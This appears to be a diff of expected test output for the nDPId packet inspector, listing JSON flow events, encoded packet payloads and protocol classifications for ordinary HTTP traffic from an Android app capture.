-00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Tencent","breed":"Acceptable","category":"SocialNetwork"},"http": {"hostname":"qzonestyle.gtimg.cn","url":"qzonestyle.gtimg.cn\/qzone\/openapi\/qc-1.0.1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile 
Safari\/537.36"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Tencent","breed":"Acceptable","category":"SocialNetwork"},"http": {"hostname":"qzonestyle.gtimg.cn","url":"qzonestyle.gtimg.cn\/qzone\/openapi\/qc-1.0.1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1654385142780,"pkt":"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"} -00986{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00986{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1725,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142780,"flow_last_seen":1654385142780,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1654385142780,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1654385142822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1654385142822,"pkt":"nLbQ0+MztKXvZygQCABFAAW++zYAADsGcsCO+roiwKgCfgBQldK5Y27yMlYwOoAYAQVIgQAAAQEICvTzitlqRnHO54B5x8bkMcj5rKNoQVor\/BQm3SPhmDDpDadH0sdUWEzHsJJG991J7GNcFmCfxsiCjLv8IWZo8ULPdOfCMeRMHHcaL4h1aKboaPInsYMSW5QQo\/JCypuKRdiaRrzY2sbGM\/MaXYMUvlY4IMPTWRAEu7PZrqdtp71d2OBq619OgHIbAeKGBf4Bk3Id+7\/Im81abelC9otiLtO5YiawFAcj5R83pbWUcSiA76rl5Zm5g+uGECfDCS0WsSYMIje33Kz7B\/CQHCjw+nh4lksNr3TtgeW4\/7JajIFAnfl17iI5bMpgNpVCgF9JYXCeHhfCCyiGI\/A3u+npcQq4MpT1eNV1\/saxKMf5Qld4T4rFFSIEwfgCG6P2ha33lVMWBaSFxO\/Mz+reiumYzQALP+eugpm6Q068chVxjvG91RjkLubAMoQDS\/mM4KwKspbzcHmHS8I3JKFhcges1eYj\/zbOWRn\/zLtgiQYZGgjfr8jKeNbuiqxLnvV9AR7EGSgXQt6gokwf+DutNqkLpb2FuyF5RXWlXYorjBev0MFJGfrmGtJd0nmEt8TAsc6HgqosNCWIgBZ\/EIx94x7v5p1LZ37xY5yDfD7teu0ZnLVzreCO3cRT6kfODUmHBwAbkYP39RCb6OD9O8RxxhjjnTrNrfxSTwe\/9Ap\/jCq3bGHW9OQ8Gm5fmTRUVwTYDyvfTZbEUP\/xOjLeI963wruwl+uBpHGIGjekHuK8l0SLl0g6pAb4F+iQWhtJFEsIVUiT+yWC6SNbe7EQQW4hgL7iTEmA0hdpq08vOQHZVq3u6M\/V+efq\/HNQ1sIp5t5lAUlbZrMHcijjYEukGH\/U1y1\/R9E10r2UGy1kBD6G7ldf3OBf3EDOMPJ3eWBdLh3BKN08SgKpcwBGu466yzavc4caXSXxKBb1cwUyYZLjMYcjDi09P3XFJ0SsXpzC75HdI3sX+AqtSARtclGx0X+hBBJhsyP41pofAbHoV40IDXhlkAqu2Xvp971SqecErV5bCH\/65Z7X9UlSrUeC\/VajwtN\/Mh2OP5AWY\/KrPPEpbXBTrhGP0\/drXl9b1ZRKfRkpIs
BIEQOUVOEJSRKrx5tv9cs8CLA7IDFWlQPElS8mbTe\/FO4uBUzpai\/4e6NjNEkD\/x4ZgoFXLg94l\/agS4O2twbkzdeIG7LuYbfwHO76ewTIlFAsrsEvBrnz9wTTNN\/TnzpUn8JQ1\/dtrIKxXa74vBeLh9AgfuxeiMxuaBTfIvvK5V+5AaCmLu378MinCP1sJLxucnjd5DsEaHLL3ecT8g2W\/QHKN26grKg3503SO2\/2OxCu\/F1Q5f3Ice+Y\/x0VdO51gA8bbfeGHjbb3hWyAHeoW70q+XcMrdEd7zrg79b6uuXC73UAFURSwyrdBEIN+jX2rzjIfyW+4pvf+uZSH7\/Gc2MTbvFBbbX9b16PX1pRGaInNqfGLtHsUG8B3BtmqQeBlhpWHPYRpVnuOJzeNZgLCARxEVRyaWKKRTH2+XLDXc12oMveqHL3C+SNepipqTSMcGdGzahhXQ+6QOkPgJRGSQjkWV4Ihw5zcw7g5EwAxblTAQnq5qbS8j42+Sd9fHqM7rDAaAi435TSllIRWgNcggISMZTiMSn2Xq4iffhytWQiEe38ThBxbwfdFoJzj+0YwbO5hgM40IsBqTiUXYLH1oBFcUKfLbjQ2EIyfrFeqTy9WHdaf1+sN9pPGxdRyW42KrOLgfPUuaivc68Az\/QdWL8YFJ6SM8LAMjT6K72yfsZLGjwMPCc9x8WNKfLmVin651eeKG0Byt5g4BaGw1+4KUXMDq\/IbxY5Z52DnCKBtwYfZtEkuOdMA4d5p8DNe3HW0cb5kRtcmr+82eVnLKJN8C7lbnah\/f\/T\/hnL61q0OUO8Mqo="} 04309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2902,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2902,"pkt_l4_len":2868,"thread_ts_msec":1654385142845,"pkt":"nLbQ0+MztKXvZygQCABFAAtI+z0AADsGbS+O+roiwKgCfgBQldK5Y3R8MlYwOoAYAQUXfgAAAQEICvTzivJqRnH4pI5HyS0AYhnjQ\/uM5bjVvdjTZUjnqR0eArR6Be4a1wlGx7sAYKbldp5x+4IB7EuNMmGKaDrhBGhnYSaYzZrRF42BrogKrXtwaM6IhhfzBp54pTv5mxi1Vq9j6Sj+JkZH8edt9wgeNtxNd6vtvoXHbfcZD7n0Lvbexf7DJ9aouvusseG+Yo1N94A1tjgH\/j7238WVfeYe08Mr5p7QwwEzNKvL68eaaywX0ixejNW1VvuVX0granODrtiMbh8LsjjmjjFVIprX1CWWhg7qrxxkUBgrmJQ6j6MULhjinsYyyhrGtKm5PH41RvFS4mIYIjSJl1pQEMXQD4LVF1Us08JQLyJlo6NiK6uQyqLIR1SJIJVAyRv55Gr+3qrT3MgoOM8R4tWGjOoZitbfxw3h8YUG3RtUSljx8O8cxw2RubmceaIyt8zMuZLPiDA6gU83k1EwKG6JrCxDEWtxNoD0rV1mH\/NYtEoxq65nBCrYnPpNY9HX1mJPWi7FmLllQgRRwrU6JTEf4xo9g2ealbex03yGkYNE+LWlCYLxM59i7W2bdbapzuJkPNq4nBhmTIwZ7HM7B8AIU9jlF\/7CDW5rCNS4yU\/VtT8x3t7NI0tF8sKQQPT9mYSR+KXo43OVsiNSagq+CO8UiwcxhfQh6l5ohfHWIeEnJSpVG4u9onh2uW7JILC
12lLhFWXnc8N44Sw27UTxst41QNTwV+xYU892vhrHfSIcd65w3CfAZ5tGKIzPy9Wwwuc4p8r\/srrxb9T4F9X4N2gccOZ3+Km5ddhGhDm1mpqf6ZUTySUzhPOVbgDchl65OalowWeIcCWnGmDka3MOWGLg1gXmPHiEOTcMIXI34AWOKdKmQzVIfGbcoKyOvVbbJR0l8+9sZoaQYfKS4LWI39QMxb41wsq3uaszHXj3xcXNrtl+\/NhQEvyYvCjGTlpx5VvljLV9\/BVzo0K+uomDOj70hNX+XJhV4UdqltzbraCdMzEMEyU2zJnkkiLZWU5C3bJUE3\/8cHZuucEwum8ErlY4k4XujuSv8srnYT9bUi0vK6LnxjV43BXl6\/H7N0CLnnLtPhDqw1E8sEUPKHoeWqyjeCpvvRIlK5X+YdIIpPDOoDprBxtaWhdISZ8UYQtTjCgxRJ4nuZhaXFq4EvaEQMxjuWu5AyF6FBXgFXcJc2RYo3xpIY5DUU2Glo2X9r+zWBihZiX2a2QEH\/CRBXJYjlerovJNyUabAltDEgYkRVE13ns4vMaLiVMYENSc8LsQMS3EO0sbQkNFVeylEgATyEDl3O7iZCW6SRIKY5bkUFMnydnSU3TEWi6wdJovQbEI67kSl\/kSFBV2M1eiu6KNrVyJXr4ExYjdzpXoL48Kx9On8fRNCHq\/wk3xDa9SywcRHKz4an70wxUl8qMfre7XKJFoPUmQLiZy+Coh1G4g9fHqtZrQWo3zazVdXfaayk7V9yYJD9gEGXSe3CTyPDFPrtvV3b6lZm7N6cTbOVnnDDAj1NsfjsdxD20IH5\/ken6S7wyEgYjnNpGI9CuGiduUQbS+wVEAs5Q78+6TR4PCYlMRckeNSKIVJnUKocQ4kbaOUQYzQl8BTF9kOy9r68JLVvPOST4gHhffAiAAtOBH+3gZMN4FH\/gAtbA9YA8BgF\/y3BhNtlwgRlIKeIsnCBS8w456wH4Ui3iMVy7dXQ5YivxPZrMN\/oMUaUI2m2h40Y81vuqome5U3tsYJjPF32Lxjd2hWUf7QDjUmRQupWj+XzWMMCisX2WSZsnUVO3uqSFzv47KUHJHOKRxAiOAPRsT5MMpTJH+NnAKgCw\/Re6khvgvkssb+V8xcOgzLLE0ZhT45BwMEmk\/fYrN1lyte5Y4+3VkCz8nT5SquzrCNCVsu2hnYUDdeyNARsgsLtMJyWIx75RiB\/qaUijgcSBVboGY5puilf1EHUvSCiv1bdZ6H2PkdfQBkg8n4kHYR75K\/PW\/MeyeDK9hJXCAx6bF44GYiwUKXJG+xCTVgEIURHE9l1HXGRu5jA2dsZ3L2KYM4VBm0tcGFX2oyRllBMwVoI\/18oO4BCXPPSBPs7HY74\/8TpKFTptFVYeJodt8pLc4v6+TBQ089vhVIrqMa6VMO4Sia8Jx2hlgM5ISrkxWvjTW69evDs\/O3nErIzUVRA2S6w1qOxcdCB7meY+MN8ZO4zssh9SqjchN3NR7bx8lTuUSrzbiJIOd+koZpzOVe1+C7qYIyc20QWhoXDmLp45I9WL\/dWIbcYNjpFklD4c3SAX+W+T88NGMdlEIxXb4gloteH7H8Zh\/iDcHslxsea7pN0yH3xl4\/729D10m4zIlT4gDm4QlwCxtOavkG8C\/fUI88joGaMIzN3\/fyCdEPOcoaZnrFIYpmwZqO0q05YS2mtQ2FHoP82k7ZiPj8gR1\/EgBAaxfbdlicyE2wLGqliORq0AhMxGR14aG6i4vpaaR4lRiSKbAlGedLHQCYWgj3wfLauRj7H9Y3YNWWxudQSvb7mJs\/rcmC8jhLGvRBe36JX+\/xMfElBG9JfhYYbMr4QkhOprnZusv47xF9axxOQTMLbdWEMaasGx\/MoA880Tkakr4cMfx6PpJlSnUPn0Uo\/QQ07kDHzBsz+UhU4X+68q9d\/eEBkvstT25167EXksRCWAMdbnfRP69
f0U5A51zL4KhAune3GtgTIbGA9fXTROJMfsKY54F9hUg9JvEHTjmrap1nlNfztngORvLOds8ZzOXI7FlX8qVpQzpLyy75R4C7exfoSDp0Bc6yhvv0F8ThnH2jcI2nbYzm63d4OmJ450fKvNfPp03sv6+d6Pr7y\/O4GxW+GNtX7VyUyxqsz+8n0BUcPfRpAIKdaAGPk+wuqv2KC\/A2xSN8XIiCYsP3FbbcYFEMdL5aklTdsfrtgZtv6f4ffRPczw7UcYsknACIguIpBCRs7j8BDVe0sxCS0xX7IY8UEYmZQVoNcKwH+dIXOFRbMcIoUh28lCheGe2zTcN6cm0bCsxLCACeypCfrlWN76fyFC3Ik1sXQPH6j0u\/dtyjZ8TFkgCsel7Ll7gBRsdxrNJUjZNsRwrYxkuwkBHNKFE+cRNKo5tQN6f1fO2435RL4D3v8qXuuN+k88bjvtdPsMX\/5TPUJ51xDM0FMjnZ0CPy+fnsOTy+QVQ4vIZL\/VO1Av0qaNe4NOpeoFvZ+pl0yDOTiRKDRcpSGYMHmZqta9i6EpNjVla+iwG5vx\/WED4QcusAyARzmYGnWMQa5eoCHo4sf9M3Pd4A6wHne64x+Ix6Lgn4jHsuB\/EY9pxT8Xjl8Q9TxY8sruiye+JETjJeRAnOpDGvGrUycVVkgwbFUPnUKSPgbwAcNYveO85rx3\/U+1js\/bxQu3kn2qfmLVPFmpnndzAtNqI6ruRf2dDf93j2D3BWMsYtFzKJWMul9RJDt59wmWReksyICc7g4VNCUCEN9PiZaDUEUMU0uFy3gUgs\/CCtHIk3IEf9YfVpSRorVXn5o7td2xlFGcCkSSIltOyFWnpMvvfahuAiHAufap6\/gf7E0bLNptBztBoGNDiB\/vrQiHVrgNEBKwX+iKsEDt8sL89XpFXu1z40uel7vAvcE6tG7vDjnvHcfS1cfXeiJZGXeFlP24L6wNoPZ5L10\/cxSggQOUkzAQ6T14+bneL6ncywsTDpJK5N6jtUHJFH138c5L1boyertj9LPaW3atN\/wBzGPCat5x2PHQt8IYcId7G8FTZZTYKh61w2B\/14mls+f6uafTFovszDO\/WhNlyGncxCi4v0TRfeJ4Z044l5iS+NA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385142780,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":4774,"flow_avg_l4_payload_len":1591,"midstream":1,"thread_ts_msec":1654385142845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; 
Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385142780,"flow_last_seen":1654385142845,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":4774,"flow_avg_l4_payload_len":1591,"midstream":1,"thread_ts_msec":1654385142845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"pagead2.googlesyndication.com","url":"pagead2.googlesyndication.com\/pagead\/show_ads.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01034{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":487,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":487,"pkt_l4_len":453,"thread_ts_msec":1654385143337,"pkt":"tKXvZygQnLbQ0+MzCABFAAHZOzFAAEAG8R7AqAJ+jvq6ro98AFDBsgXgq0aUtoAYAfYOmwAAAQEICoBTPnRMQU2TR0VUIC9hbmFseXRpY3MuanMgSFRUUC8xLjENCkhvc3Q6IHd3dy5nb29nbGUtYW5hbHl0aWNzLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/analytics.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile 
Safari\/537.36"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1740,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385143337,"flow_last_seen":1654385143337,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":421,"midstream":1,"thread_ts_msec":1654385143337,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/analytics.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 04308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1654385143361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2902,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2902,"pkt_l4_len":2868,"thread_ts_msec":1654385143361,"pkt":"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\/w\/n6L49nLtRoQEKG0T3CxKKaVlaAt0CpQl20pICUmaoUBJns\/+7t+WZMtJOMM7nXVKZE2Wpa2tPctvjDrxsNXt+MH9ypOFhUfb3d5dv9W8HD46uVSPttvdwaivHu23or7s3z3aGg0vu\/1BceHR8YfXX5f3W7HqDNTyXqI6w1ajpfqVR1s9GV+q5dViaeHJysJv2X8kZTi8bA3G44FqN0Q7TF8pRRTcy1AWB712a+h7RS+ookEcSlmV9dJ5q\/MoHo+9USdRjVZHJV4YDu96qtt4FBfVrYqP436rNxyP3SffQxdeAe2DaqPb9\/GcVGWxrTrN4eXSkp\/glZetxtAPgmpgC8bj391W8qgUhmFUi8O4npwvLeHvYhgeRT9VPCz2+t1hFyOg3BqKKvgT3k\/0bzTh4V9PfaEdQ\/yIvicKouKlHBzddD70uz3VH975cUBjkvWYOqA\/wUT8cjrImkdoLoNWw5fTPURB0FfDUb+zWKqaRFmPpR+u\/PBrFfr\/cjjsDWrja9lqD7vjxrAXVMb1H5WV2n\/On1BxHYnx4yBYaV
UZEP7FAg\/Dm1Yn6d6IkUkUabmH3f6d+B0m3Xh0TY3FTdiRv1tNSfnidmqGfhdlkuz8pmr71FB1VL82m4WqYrEcVKhoOKQxcOnSUu7R97odWnvqVH\/\/HS2O+BM6UH5XPNna3d073A3T1HhcP6+mT\/XyebhY0s23wpVKvbT84rzweEW8yo1axDnYXfIcYAtL1WTTwlU1KRToEylfhZLAxLYIqQUtZqLibqJOP+1td6973Q6+QQF0i33Va8tY+StnhZWm8B55ASDTLPSjKFTFQZuWxy8HxZ\/dVoc7FHEtqszpMZrX3WQidqYWIiJIjMLjYb\/VaaLRsLvfvVH9bTlQ2Cs0XI\/3QNxtexgNbc5etz\/kNG0kWxZu+9lDMB5v+8NiuxtLvCjLr2Zta1Sd0vbNh6PrCAtevOwOhh15rUx5xe2Gnqlr3wNgUyfZC2vPSxXOHeSz19fXKp4XBFRI3fJ7sfHSl4ROejxecN5lc7NZ3BLU0\/T0mKV5zeChkUn+h\/b26ykgEolQGjoa+Vmr\/s1aDG5aw\/iSCu5jynnkjfrti073otGXTew3r5KEnleVS0v0UX3VMGgPySLtUXV7RGv5H4IYAtaXSU2XVEyFwSgaDPt+SST0Ihkm1aiv5FVVvygFgIoMG7kSntYKNoWdsL+ar2rMY1r5cXNzc5Y8OSuuMBYnlEf4MKEtgMXBBtODQY7ZUTSo3IAARfTaaeCZhpBGDjAaKTzkO5PDS+qsiF8DCC5U\/PExId6KhixTJ5uvclDLsitUrZA9Vh1ssUJ7v7QZ+glQT5AuiKxbpLFcPtengpNB6xlwJ3q7ow935L9Gqn+np3+gZD++TCffq3mY\/qriGX1FgKcsQOa7ULeEaQcEm7qb7Puy81mG5RSz1XLDqwDccp9IK5brPoNNhhE5cIb4Hz1EXZ2OezlqD1HNwu\/EbC45Edu549Hm08SnnVW8WXCj4U3Em1xTPlXD38WYXjpUO211zSeIxGcuLS34Eb85lJYqibK1pM8jsiA2UMpwIWLARSHGHEUP7ACDIu55s+nuhd1P9GyTAq0ruhNhe6pIkUJWLPQSUx2dEJjNCpMWl4JRZcTwP5lU7Rc\/2vUzYkKGb0WEszGmsyrOzqoCjT+qgxg5D2OL0KJJ2seer6eN9sDWq+3XO2923+69e79\/cHj04eOn45PTz1++fvtOcFCgBc5Nf8ErlVfX1p9uPHv+YvnCs13LAkHVBD2+Fe+yob7H8rwN347H9MLqu\/DdeEyjTw\/YKKyfT488LoRremxJGBcyIBWKHlezR1rPYnwp+9t0Rm4NifgSzRD4z80rEJVREpehms5fRf5V2Hj5crXaCP3G0lqwubk+br58uV5thn5zqfyUMlbHly9fblQvl8KNtSohDf8y3FgXtNf9JiWw54q90eDSf1u\/Ohdv6w38aeLPJVF\/ds7NLqdjeiGdlkgyQZg++ld6RV1qQ89Bx3wljRrkh+iF7+qdcxzgnVG7vRj2LB3RQ97iyo\/62eDsVpbOnzxeKQ7VYOh3gmB42e\/ePNrp9+kV3mnnqtO9wRgGamP9keoQkUHo9pEcPsKLKkRyd4KqHf7V5OHVo33i4dipVi1ZFPnL5YBWJvJLWI7Ip1mi6edfjG9jnQ5rotyXy\/Sr7NBjrLlG+sVGv3u9bVbKV1gCWiNqvLG+GDZpiz5Qs0Grt7S6XsIKrgYCtS8frt3c3NxYKr+g5Q0Cop4YK+zz34PQnPNHLqmpN0pM53yYSILXQx\/HbVqhSQSk3ywOZb+piIlpFgf92CCh8fh+QsSCylWO\/rIyr2NMR0lrGNzf+t51dzRQRIt3aK6DKmVcqbtRzz7QiXXdGnpEe1Q17fH25GD\/Tbd\/bfrMWJ2irlr9uwruh0c+GD5a8WIs2239MKnqwYG2nogPc8kgGd6jQSTjK8J2SZeYlc6gEgl7cFRWaf1jwQiVn2NBQHU9qCRiQGjxLbCmmlRpnosggv
